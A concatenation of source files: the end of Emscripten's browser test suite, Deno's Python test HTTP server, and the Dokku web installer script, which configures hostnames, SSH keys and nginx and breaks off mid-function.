    --preload-file and with a separate file_packager.py invocation."""
    create_test_file('test.txt', 'hello from file')
    self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
    self.run_browser('page.html', 'hello from file', '/report_result?15')
    # with separate file packager invocation
    self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
    self.compile_btest([path_from_root('tests', 'access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
    self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
    """A shell file containing non-ASCII text (an emoji) must pass through the
    build unharmed."""
    create_test_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
    # Read the stock shell via a context manager so the handle is closed
    # deterministically (the original leaked an open() handle).
    with open(path_from_root('src', 'shell.html')) as f:
        shell = f.read()
    create_test_file('shell.html', shell.replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
    self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
    self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
    """emscripten_thread_sleep() works inside a pthread build."""
    self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
    """Move the build outputs into subdir/ and verify the page still loads them."""
    self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
    ensure_dir('subdir')
    shutil.move('test.js', os.path.join('subdir', 'test.js'))
    shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
    # Read the HTML via a context manager so the handle is closed
    # deterministically (the original leaked an open() handle).
    with open('test.html') as f:
        src = f.read()
    # Make sure JS is loaded from subdirectory
    create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
    self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
    """Load a MODULARIZE build from subdir/, via both factory invocation styles."""
    for args, creations in [
        (['-s', 'MODULARIZE'], [
            'Module();', # documented way for using modularize
            'new Module();' # not documented as working, but we support it
        ]),
    ]:
        print(args)
        # compile the code with the modularize feature and the preload-file option enabled
        self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
        ensure_dir('subdir')
        shutil.move('test.js', os.path.join('subdir', 'test.js'))
        shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
        for creation in creations:
            print(creation)
            # Make sure JS is loaded from subdirectory
            create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
            self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
    """MODULARIZE builds loaded via eval() (no document.currentScript) must
    still locate their files in the current-directory case."""
    # test both modularize (and creating an instance) and modularize-instance
    # (which creates by itself)
    for path, args, creation in [
        ([], ['-s', 'MODULARIZE'], 'Module();'),
        (['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
    ]:
        print(path, args, creation)
        filesystem_path = os.path.join('.', *path)
        ensure_dir(filesystem_path)
        # compile the code with the modularize feature and the preload-file option enabled
        self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js'] + args)
        shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
        shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
        # Write via a context manager so the handle is closed and the contents
        # flushed before the browser is pointed at the file (the original used
        # open(...).write(...) and relied on GC to close/flush).
        with open(os.path.join(filesystem_path, 'test.html'), 'w') as f:
            f.write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
        self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
    # Single emscripten_request_animation_frame() callback.
    self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')

def test_emscripten_request_animation_frame_loop(self):
    # Repeating requestAnimationFrame loop variant.
    self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')

def test_request_animation_frame(self):
    self.btest('request_animation_frame.cpp', '0', also_proxied=True)

@requires_threads
def test_emscripten_set_timeout(self):
    self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

@requires_threads
def test_emscripten_set_timeout_loop(self):
    self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

def test_emscripten_set_immediate(self):
    self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')

def test_emscripten_set_immediate_loop(self):
    self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')

@requires_threads
def test_emscripten_set_interval(self):
    self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
    self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

@requires_threads
def test_embind_with_pthreads(self):
    self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])

def test_embind_with_asyncify(self):
    self.btest('embind_with_asyncify.cpp', '1', args=['--bind'] + self.get_async_args())

# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
    self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])

def test_emscripten_throw_number(self):
    self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])

def test_emscripten_throw_string(self):
    self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])

# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
    self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])

# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
    self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])

def test_no_declare_asm_module_exports_asmjs(self):
    # Cover both the default and MINIMAL_RUNTIME asm.js builds.
    for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
        self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'WASM=0'] + minimal_runtime)

def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
    self.btest(path_from_root('tests', 'declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1', '-s', 'MINIMAL_RUNTIME'])

# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
    args = ['-s', 'MINIMAL_RUNTIME=2']
    # Cross product of wasm/wasm2js/single-file modes with MODULARIZE on/off.
    for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
        for modularize in [[], ['-s', 'MODULARIZE']]:
            print(str(args + wasm + modularize))
            self.btest('minimal_hello.c', '0', args=args + wasm + modularize)

# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
    for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure', '1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
        self.btest(path_from_root('tests', 'small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])

@requires_threads
def test_offset_converter(self, *args):
    try:
        self.btest_exit(path_from_root('tests', 'browser', 'test_offset_converter.c'), '1', args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
    except Exception as e:
        # dump the wasm file; this is meant to help debug #10539 on the bots
        print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
        raise e

# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
    self.btest(path_from_root('tests', 'browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
    """Check a WASM=2 build: runs as Wasm when available, and falls back
    to the wasm2js JS when WebAssembly is deleted from the VM."""
    for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
        self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)

        # First run with WebAssembly support enabled
        # Move the Wasm2js fallback away to test it is not accidentally getting loaded.
        os.rename('test.wasm.js', 'test.wasm.js.unused')
        self.run_browser('test.html', 'hello!', '/report_result?0')
        os.rename('test.wasm.js.unused', 'test.wasm.js')

        # Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
        # Use context managers so the handles are closed (the original
        # leaked the objects returned by open()).
        with open('test.html', 'r') as f:
            html = f.read()
        html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
        with open('test.html', 'w') as f:
            f.write(html)
        os.remove('test.wasm')  # Also delete the Wasm file to test that it is not attempted to be loaded.
        self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
    # A corrupt .wasm must make the loader fall back to the wasm2js build.
    for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
        self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)

        # Run without the .wasm.js file present: with Wasm support, the page should still run
        os.rename('test.wasm.js', 'test.wasm.js.unused')
        self.run_browser('test.html', 'hello!', '/report_result?0')

        # Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
        os.rename('test.wasm.js.unused', 'test.wasm.js')
        shutil.copyfile('test.js', 'test.wasm')
        self.run_browser('test.html', 'hello!', '/report_result?0')

def test_system(self):
    self.btest(path_from_root('tests', 'system.c'), '0')

# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
    # This test verifies it is possible to override a symbol from WebGL library.

    # When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
    # the behavior afterwards.
    self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
               expected='5121',
               args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])

    # When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
    self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
               expected='5121',
               args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])

@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
    # TODO Convert to an actual browser test when it reaches stable.
    # For now, keep this in browser as this suite runs serially, which
    # means we don't compete for memory with anything else (and run it
    # at the very very end, to reduce the risk of it OOM-killing the
    # browser).

    # test that we can allocate in the 2-4GB range, if we enable growth and
    # set the max appropriately
    self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
    self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])

@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
    # TODO Convert to an actual browser test when it reaches stable.
    # For now, keep this in browser as this suite runs serially, which
    # means we don't compete for memory with anything else (and run it
    # at the very very end, to reduce the risk of it OOM-killing the
    # browser).

    # test that growth doesn't go beyond 2GB without the max being set for that,
    # and that we can catch an allocation failure exception for that
    self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
    self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])

@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
    # TODO Convert to an actual browser test when it reaches stable.
    # For now, keep this in browser as this suite runs serially, which
    # means we don't compete for memory with anything else (and run it
    # at the very very end, to reduce the risk of it OOM-killing the
    # browser).

    # test that we properly report an allocation error that would overflow over
    # 4GB.
    self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
    self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])

@disabled("only run this manually, to test for race conditions")
@parameterized({
    'normal': ([],),
    'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
    # the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. often that occurred in 0-200 iterations, but
    # you may want to adjust "ITERATIONS".
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
               expected='0',
               args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
                     '-DITERATIONS=1024', '-g1'] + args,
               timeout=10000,
               # don't run this with the default extra_tries value, as this is
               # *meant* to notice something random, a race condition.
               extra_tries=0)
class emrun(RunnerCore):
    """End-to-end tests for the `emrun` launcher tool."""

    def test_emrun_info(self):
        """`--system_info/--browser_info/--list_browsers` must print sane
        output and never a traceback."""
        if not has_browser():
            self.skipTest('need a browser')
        result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
        assert 'CPU' in result
        assert 'Browser' in result
        assert 'Traceback' not in result
        result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
        assert 'Traceback' not in result

    def test_emrun(self):
        """Compile with --emrun, launch via emrun, and verify argument
        passing plus stdout/stderr log capture."""
        self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
        if not has_browser():
            self.skipTest('need a browser')
        # We cannot run emrun from the temp directory the suite will clean up afterwards, since the
        # browser that is launched will have that directory as startup directory, and the browser will
        # not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
        # delete it. Therefore switch away from that directory before launching.
        os.chdir(path_from_root())
        args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
                     '--kill_exit', '--port', '6939', '--verbose',
                     '--log_stdout', self.in_dir('stdout.txt'),
                     '--log_stderr', self.in_dir('stderr.txt')]

        # Verify that trying to pass argument to the page without the `--` separator will
        # generate an actionable error message
        err = self.expect_fail(args_base + ['--foo'])
        self.assertContained('error: unrecognized arguments: --foo', err)
        self.assertContained('remember to add `--` between arguments', err)

        if EMTEST_BROWSER is not None:
            # If EMTEST_BROWSER carried command line arguments to pass to the browser,
            # (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
            # so strip them out.
            browser_cmd = shlex.split(EMTEST_BROWSER)
            browser_path = browser_cmd[0]
            args_base += ['--browser', browser_path]
            if len(browser_cmd) > 1:
                browser_args = browser_cmd[1:]
                if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
                    # emrun uses its own -profile, strip it out
                    parser = argparse.ArgumentParser(add_help=False)  # otherwise it throws with -headless
                    parser.add_argument('-profile')
                    parser.add_argument('--profile')
                    browser_args = parser.parse_known_args(browser_args)[1]
                if browser_args:
                    args_base += ['--browser_args', ' ' + ' '.join(browser_args)]

        for args in [
            args_base,
            args_base + ['--private_browsing', '--port', '6941']
        ]:
            args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
            print(shared.shlex_join(args))
            proc = self.run_process(args, check=False)
            self.assertEqual(proc.returncode, 100)
            # Read the captured logs with context managers so the handles
            # are closed (the original leaked the open() objects).
            with open(self.in_dir('stdout.txt'), 'r') as f:
                stdout = f.read()
            with open(self.in_dir('stderr.txt'), 'r') as f:
                stderr = f.read()
            self.assertContained('argc: 4', stdout)
            self.assertContained('argv[3]: --3', stdout)
            self.assertContained('hello, world!', stdout)
            self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
            self.assertContained('Testing char sequences: %20%21 ä', stdout)
            self.assertContained('hello, error stream!', stderr)
|
http_server.py | #!/usr/bin/env python
# Copyright 2018-2019 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 serving the deno
# root directory.
import os
import sys
from threading import Thread
import SimpleHTTPServer
import SocketServer
from util import root_path
from time import sleep
PORT = 4545
REDIRECT_PORT = 4546
class ContentTypeHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    # Handler serving the deno root with test-specific overrides: a canned
    # multipart response, a POST echo endpoint, and forced MIME types for
    # media-type-sniffing tests.  (Python 2 API: has_key/getheader.)

    def do_GET(self):
        # Canned multipart/form-data body used by form-parsing tests.
        if "multipart_form_data.txt" in self.path:
            self.protocol_version = 'HTTP/1.1'
            self.send_response(200, 'OK')
            self.send_header('Content-type',
                             'multipart/form-data;boundary=boundary')
            self.end_headers()
            self.wfile.write(
                bytes('Preamble\r\n'
                      '--boundary\t \r\n'
                      'Content-Disposition: form-data; name="field_1"\r\n'
                      '\r\n'
                      'value_1 \r\n'
                      '\r\n--boundary\r\n'
                      'Content-Disposition: form-data; name="field_2"; '
                      'filename="file.js"\r\n'
                      'Content-Type: text/javascript\r\n'
                      '\r\n'
                      'console.log("Hi")'
                      '\r\n--boundary--\r\n'
                      'Epilogue'))
            return
        return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)

    def do_POST(self):
        # Simple echo server for request reflection
        if "echo_server" in self.path:
            self.protocol_version = 'HTTP/1.1'
            self.send_response(200, 'OK')
            # Mirror the request's content-type back when present.
            if self.headers.has_key('content-type'):
                self.send_header('content-type',
                                 self.headers.getheader('content-type'))
            self.end_headers()
            data_string = self.rfile.read(int(self.headers['Content-Length']))
            self.wfile.write(bytes(data_string))
            return
        # Any other POST target is unsupported.
        self.protocol_version = 'HTTP/1.1'
        self.send_response(501)
        self.send_header('content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(bytes('Server does not support this operation'))

    def guess_type(self, path):
        # Forced MIME types keyed on filename markers used by the tests.
        if ".t1." in path:
            return "text/typescript"
        if ".t2." in path:
            return "video/vnd.dlna.mpeg-tts"
        if ".t3." in path:
            return "video/mp2t"
        if ".t4." in path:
            return "application/x-typescript"
        if ".j1." in path:
            return "text/javascript"
        if ".j2." in path:
            return "application/ecmascript"
        if ".j3." in path:
            return "text/ecmascript"
        if ".j4." in path:
            return "application/x-javascript"
        if "form_urlencoded" in path:
            return "application/x-www-form-urlencoded"
        if "no_ext" in path:
            return "text/typescript"
        if "unknown_ext" in path:
            return "text/typescript"
        if "mismatch_ext" in path:
            return "text/javascript"
        return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path)
def server():
    # Build (but do not start) the main content server on PORT, with the
    # extension map extended for TypeScript/JSON assets.
    os.chdir(root_path)  # Hopefully the main thread doesn't also chdir.
    Handler = ContentTypeHandler
    Handler.extensions_map.update({
        ".ts": "application/typescript",
        ".js": "application/javascript",
        ".json": "application/json",
    })
    SocketServer.TCPServer.allow_reuse_address = True
    s = SocketServer.TCPServer(("", PORT), Handler)
    print "Deno test server http://localhost:%d/" % PORT
    return s
def redirect_server():
    # Build a server on REDIRECT_PORT that 301-redirects every GET to the
    # same path on the main server.
    os.chdir(root_path)
    target_host = "http://localhost:%d" % PORT

    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
        def do_GET(self):
            self.send_response(301)
            self.send_header('Location', target_host + self.path)
            self.end_headers()

    Handler = RedirectHandler
    SocketServer.TCPServer.allow_reuse_address = True
    s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler)
    print "redirect server http://localhost:%d/ -> http://localhost:%d/" % (
        REDIRECT_PORT, PORT)
    return s
def spawn():
    # Start both servers in daemon threads; returns only the main server's
    # thread (the redirect thread is not monitored afterwards).
    # Main http server
    s = server()
    thread = Thread(target=s.serve_forever)
    thread.daemon = True
    thread.start()
    # Redirect server
    rs = redirect_server()
    r_thread = Thread(target=rs.serve_forever)
    r_thread.daemon = True
    r_thread.start()
    sleep(1)  # TODO I'm too lazy to figure out how to do this properly.
    return thread
def main():
    # Keep the process alive while the server thread runs; always exits
    # non-zero so callers can tell the server stopped rather than finished.
    try:
        thread = spawn()
        while thread.is_alive():
            sleep(10)
    except KeyboardInterrupt:
        pass
    sys.exit(1)


if __name__ == '__main__':
    main()
|
dokku-installer.py | #!/usr/bin/env python3
import cgi
import json
import os
import re
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.19.12'
def bytes_to_string(b):
    """Decode *b* to text and strip surrounding whitespace.

    ``bytes`` input is decoded with stdout's encoding (UTF-8 fallback,
    e.g. when stdout is not a tty); ``str`` input is only stripped.
    """
    if isinstance(b, bytes):  # isinstance instead of `type(b) == bytes`
        encoding = sys.stdout.encoding
        if encoding is None:
            encoding = 'utf-8'
        b = b.decode(encoding)
    return b.strip()
def string_to_bytes(s):
    """Encode *s* to bytes using stdout's encoding (UTF-8 fallback).

    Non-``str`` values (already bytes) are returned unchanged.
    """
    if isinstance(s, str):  # isinstance instead of `type(s) == str`
        encoding = sys.stdout.encoding
        if encoding is None:
            encoding = 'utf-8'
        s = s.encode(encoding)
    return s
# ---- One-time environment probing at import time ----

# Best-effort public hostname: use $HOSTNAME if it resolves in DNS,
# otherwise ask icanhazip.com for the external address.
hostname = ''
try:
    command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
    hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
    pass

# Locate an authorized_keys file to pre-populate the admin-keys textarea.
# Bug fix: the original fetched the KEY_FILE environment override and then
# unconditionally overwrote it; the probe now runs only when KEY_FILE is
# unset, so the override actually takes effect.
key_file = os.getenv('KEY_FILE', None)
if key_file is None:
    if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
        key_file = '/home/ec2-user/.ssh/authorized_keys'
    elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
        key_file = '/home/ubuntu/.ssh/authorized_keys'
    else:
        key_file = '/root/.ssh/authorized_keys'

admin_keys = []
if os.path.isfile(key_file):
    try:
        command = "cat {0}".format(key_file)
        admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
    except subprocess.CalledProcessError:
        pass

# Show the UFW warning banner in the page only when the firewall is active.
ufw_display = 'block'
try:
    command = "sudo ufw status"
    ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
    if "inactive" in ufw_output:
        ufw_display = 'none'
except subprocess.CalledProcessError:
    ufw_display = 'none'

# Prefer OpenResty's nginx paths when it is installed.
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
    command = "test -x /usr/bin/openresty"
    subprocess.check_output(command, shell=True)
    nginx_dir = '/usr/local/openresty/nginx/conf'
    nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
    pass
def check_boot():
    """When run with the `onboot` argument, install upstart/systemd units
    and an nginx config that relaunch this installer at boot, then exit.

    A no-op unless 'onboot' is present in sys.argv."""
    if 'onboot' not in sys.argv:
        return
    init_dir = os.getenv('INIT_DIR', '/etc/init')
    systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
    nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
    # Upstart job (older Ubuntu).
    if os.path.exists(init_dir):
        with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
            f.write("start on runlevel [2345]\n")
            f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
    # systemd unit.
    if os.path.exists(systemd_dir):
        with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
            f.write("[Unit]\n")
            f.write("Description=Dokku web-installer\n")
            f.write("\n")
            f.write("[Service]\n")
            f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
            f.write("\n")
            f.write("[Install]\n")
            f.write("WantedBy=multi-user.target\n")
            f.write("WantedBy=graphical.target\n")
    # Proxy port 80 to the installer; clear any site configs that would
    # otherwise shadow it.
    if os.path.exists(nginx_conf_dir):
        with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
            f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
            f.write("server {\n")
            f.write("  listen      80;\n")
            f.write("  location    / {\n")
            f.write("    proxy_pass  http://dokku-installer;\n")
            f.write("  }\n")
            f.write("}\n")
        subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
    sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    # Web-installer handler: GET renders the setup page, POST /setup
    # applies the submitted configuration.

    def write_content(self, content):
        # py2 accepts str directly; the TypeError path encodes for py3.
        try:
            self.wfile.write(content)
        except TypeError:
            self.wfile.write(string_to_bytes(content))

    def do_GET(self):
        # Render the template with the values probed at import time.
        content = PAGE.replace('{VERSION}', VERSION)
        content = content.replace('{UFW_DISPLAY}', ufw_display)
        content = content.replace('{HOSTNAME}', hostname)
        content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
        content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
        self.send_response(200)
        self.end_headers()
        self.write_content(content)

    def do_POST(self):
        if self.path not in ['/setup', '/setup/']:
            return
        params = cgi.FieldStorage(fp=self.rfile,
                                  headers=self.headers,
                                  environ={
                                      'REQUEST_METHOD': 'POST',
                                      'CONTENT_TYPE': self.headers['Content-Type']})

        vhost_enable = 'false'
        dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
        # The presence of $DOKKU_ROOT/VHOST is what enables vhost naming.
        if 'vhost' in params and params['vhost'].value == 'true':
            vhost_enable = 'true'
            with open('{0}/VHOST'.format(dokku_root), 'w') as f:
                f.write(params['hostname'].value)
        else:
            try:
                os.remove('{0}/VHOST'.format(dokku_root))
            except OSError:
                pass

        with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
            f.write(params['hostname'].value)

        # Register each submitted key under a unique user name, continuing
        # from any existing admin<N>/web-admin<N> numbering.
        for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
            user = 'admin'
            if self.admin_user_exists() is not None:
                # Plain admin users already exist; switch to web-admin names.
                user = 'web-admin'
                if self.web_admin_user_exists() is not None:
                    index = int(self.web_admin_user_exists()) + 1
                elif self.web_admin_user_exists() is None:
                    index = 1
            elif self.admin_user_exists() is None:
                # No admins yet: keep the enumerate() index.
                pass
            else:
                index = int(self.admin_user_exists()) + 1
            user = user + str(index)

            command = ['sshcommand', 'acl-add', 'dokku', user]
            proc = subprocess.Popen(command, stdin=subprocess.PIPE)
            try:
                proc.stdin.write(key)
            except TypeError:
                # py3: the pipe wants bytes.
                proc.stdin.write(string_to_bytes(key))
            proc.stdin.close()
            proc.wait()

        # Preseed debconf so a later package reconfigure keeps these answers.
        set_debconf_selection('boolean', 'nginx_enable', 'true')
        set_debconf_selection('boolean', 'skip_key_file', 'true')
        set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
        set_debconf_selection('boolean', 'web_config', 'false')
        set_debconf_selection('string', 'hostname', params['hostname'].value)

        if 'selfdestruct' in sys.argv:
            DeleteInstallerThread()

        content = json.dumps({'status': 'ok'})
        self.send_response(200)
        self.end_headers()
        self.write_content(content)

    def web_admin_user_exists(self):
        # Highest existing web-admin<N> index, or None when there is none.
        return self.user_exists('web-admin(\d+)')

    def admin_user_exists(self):
        # Highest existing admin<N> index, or None when there is none.
        return self.user_exists('admin(\d+)')

    def user_exists(self, name):
        # Scan `dokku ssh-keys:list` output for NAME="<name>" entries and
        # return the highest captured number, or None if nothing matches.
        command = 'dokku ssh-keys:list'
        pattern = re.compile(r'NAME="' + name + '"')
        proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
        max_num = 0
        exists = False
        for line in proc.stdout:
            m = pattern.search(bytes_to_string(line))
            if m:
